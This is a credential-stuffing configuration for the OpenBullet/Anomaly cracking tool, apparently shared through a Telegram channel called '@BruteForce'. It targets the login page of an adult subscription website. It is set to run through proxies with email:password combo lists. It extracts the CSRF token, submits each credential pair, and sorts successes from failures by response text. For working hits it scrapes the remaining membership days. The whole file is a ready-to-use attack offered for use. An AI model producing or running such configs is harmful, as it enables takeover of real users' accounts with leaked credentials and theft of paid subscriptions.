[SETTINGS]
{
  "Name": "Nubiles-Porn",
  "SuggestedBots": 100,
  "MaxCPM": 0,
  "LastModified": "2020-07-31T23:16:16.6711418+04:30",
  "AdditionalInfo": "Telegram Channel: @BruteForce | Capture |",
  "Author": "@H0S31N",
  "Version": "1.4.4 [Anomaly]",
  "IgnoreResponseErrors": false,
  "MaxRedirects": 8,
  "NeedsProxies": true,
  "OnlySocks": false,
  "OnlySsl": false,
  "MaxProxyUses": 0,
  "BanProxyAfterGoodStatus": false,
  "EncodeData": false,
  "AllowedWordlist1": "MailPass",
  "AllowedWordlist2": "",
  "DataRules": [],
  "CustomInputs": [],
  "CaptchaUrl": "",
  "Base64": "",
  "Grayscale": false,
  "RemoveLines": false,
  "RemoveNoise": false,
  "Dilate": false,
  "Threshold": 1.0,
  "DiffKeep": 0.0,
  "DiffHide": 0.0,
  "Saturate": false,
  "Saturation": 0.0,
  "Transparent": false,
  "Contour": false,
  "OnlyShow": false,
  "ContrastGamma": false,
  "Contrast": 1.0,
  "Gamma": 1.0,
  "Brightness": 1.0,
  "RemoveLinesMin": 0,
  "RemoveLinesMax": 0,
  "Crop": false,
  "ForceHeadless": false,
  "AlwaysOpen": false,
  "AlwaysQuit": false,
  "DisableNotifications": false,
  "CustomUserAgent": "",
  "RandomUA": false,
  "CustomCMDArgs": ""
}

[SCRIPT]
#GET REQUEST GET "https://nubiles-porn.com/authentication/login" 
  
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko" 
  HEADER "Pragma: no-cache" 
  HEADER "Accept: */*" 

#Token PARSE "<SOURCE>" LR "name=\"csrf-token\" value=\"" "\" type=\"hidden\">" -> VAR "Token" 

#Post REQUEST POST "https://nubiles-porn.com/authentication/login" 
  CONTENT "username=<USER>&password=<PASS>&r=members.nubiles-porn.com%2F&csrf-token=<Token>&sign-in=Sign+In" 
  CONTENTTYPE "application/x-www-form-urlencoded" 
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko" 
  HEADER "Pragma: no-cache" 
  HEADER "Accept: */*" 

KEYCHECK 
  KEYCHAIN Failure OR 
    KEY "The username or password you've entered is incorrect." 
  KEYCHAIN Success OR 
    KEY "<a href=\"/\">Continue to Members Area</a>" 

#GetCap REQUEST GET "https://members.nubiles-porn.com/account" 
  
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko" 
  HEADER "Pragma: no-cache" 
  HEADER "Accept: */*" 

#KIR PARSE "<SOURCE>" LR "Membership Duration</label>" "<div class=\"form-group row\">" -> VAR "KIR" 

#Days_Left PARSE "<KIR>" LR "plaintext\" value=\"" "\">" CreateEmpty=FALSE -> CAP "Days Left" 

